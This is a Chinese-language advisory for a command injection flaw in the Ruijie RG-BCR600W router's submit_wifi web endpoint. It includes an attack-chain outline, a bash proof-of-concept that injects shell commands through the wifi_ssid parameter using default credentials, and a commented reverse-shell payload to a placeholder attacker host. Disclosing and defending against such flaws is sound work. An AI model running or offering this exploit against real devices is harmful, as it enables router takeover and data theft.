CVE-2025-56107 锐捷RG-BCR600W命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56107

漏洞类型

命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-BCR RG-BCR600W

漏洞概述

CVE-2025-56107是锐捷网络（Ruijie Networks）旗下RG-BCR系列路由器中发现的严重安全漏洞，CVSS评分高达8.8，属于高危级别。该漏洞存在于RG-BCR600W设备的Web管理界面中，攻击者可以通过向设备的submit_wifi端点发送精心构造的POST请求，在目标设备上执行任意操作系统命令。由于该漏洞利用难度低且不需要高级权限，攻击者只需拥有低权限账户或通过其他方式获取网络访问权限，即可完全控制受影响设备。成功利用此漏洞后，攻击者可以读取敏感配置信息、修改网络设置、安装后门程序，甚至将设备纳入僵尸网络用于后续攻击活动。此漏洞影响使用Web管理界面进行配置的所有用户，特别是允许远程管理的部署场景风险更高。

技术细节

该漏洞位于Ruijie RG-BCR600W路由器的LuCI Web管理界面中，具体涉及文件/usr/lib/lua/luci/controller/admin/common_quick_config.lua中的submit_wifi函数。漏洞根源在于该函数在处理用户输入的WiFi配置参数时，直接将用户提供的参数拼接到系统命令中执行，而未进行充分的输入验证和命令参数转义。攻击者可以在POST请求的WiFi相关参数中注入分号、管道符等Shell命令分隔符，后跟恶意命令语句。由于Web管理功能通常以root权限运行，注入的命令将以最高权限执行。攻击者利用此漏洞可以绕过认证机制（在某些配置下），执行任意Shell命令，包括但不限于启动反弹Shell、下载并执行恶意脚本、修改系统配置等操作。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描网络，发现运行存在漏洞固件版本的Ruijie RG-BCR600W路由器，并识别其Web管理界面地址

STEP 2

步骤2

认证阶段：攻击者使用低权限账户凭据登录Web管理界面，或在某些配置下无需认证即可访问submit_wifi端点

STEP 3

步骤3

漏洞利用：构造包含恶意Shell命令的POST请求，通过WiFi配置参数（如wifi_ssid）注入命令，使用分号、管道符等分隔符执行多条命令

STEP 4

步骤4

命令执行：漏洞函数将注入的命令拼接到系统调用中，以root权限执行，攻击者获得完全控制权

STEP 5

步骤5

持久化控制：攻击者可下载恶意脚本、安装后门、修改启动配置，确保设备重启后仍可被控制

STEP 6

步骤6

数据窃取或进一步攻击：读取配置文件获取网络凭据、部署僵尸网络、横向移动到内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-56107 PoC - Ruijie RG-BCR600W Command Injection
# Target: Ruijie RG-BCR RG-BCR600W
# Vulnerability: OS Command Injection in submit_wifi endpoint

TARGET_HOST="192.168.1.1"
TARGET_PORT="80"
LOGIN_URL="http://${TARGET_HOST}:${TARGET_PORT}/cgi/login"
EXPLOIT_URL="http://${TARGET_HOST}:${TARGET_PORT}/cgi/submit_wifi"

# Step 1: Authenticate and obtain session cookie
LOGIN_DATA='username=admin&password=admin'
COOKIES=$(curl -s -c - -d "$LOGIN_DATA" "$LOGIN_URL" | grep -oP 'Set-Cookie:.*?;' | head -1)

# Step 2: Inject command via WiFi parameter
# Payload: Reboot device after injecting command
PAYLOAD='wifi_ssid=$(touch /tmp/pwned)'
EXPLOIT_DATA="submit_wifi=1&wifi_ssid=${PAYLOAD}&wifi_password=test1234"

# Step 3: Execute exploit
curl -s -b "$COOKIES" -X POST -d "$EXPLOIT_DATA" "$EXPLOIT_URL"

echo "[+] Exploit sent. Check /tmp/pwned on target device."

# Alternative: Reverse shell payload
# PAYLOAD=';bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1;'
# Note: Ensure ATTACKER_IP and ATTACKER_PORT are set to your listener

影响范围

Ruijie RG-BCR600W 存在漏洞的固件版本（具体版本号需参考厂商公告）

防御指南

临时缓解措施

在厂商发布正式修复补丁前，建议采取以下临时缓解措施：1）立即禁用RG-BCR600W的远程Web管理功能，仅允许通过本地网络访问管理界面；2）使用防火墙规则限制管理接口访问，仅允许可信IP地址段访问；3）启用入侵检测系统监控针对submit_wifi端点的异常POST请求；4）监控设备日志，关注任何异常的WiFi配置变更记录；5）考虑在边界防火墙上阻断对路由器管理端口的外部访问；6）定期检查设备文件系统完整性，确认是否存在未授权的修改或新增的可疑文件。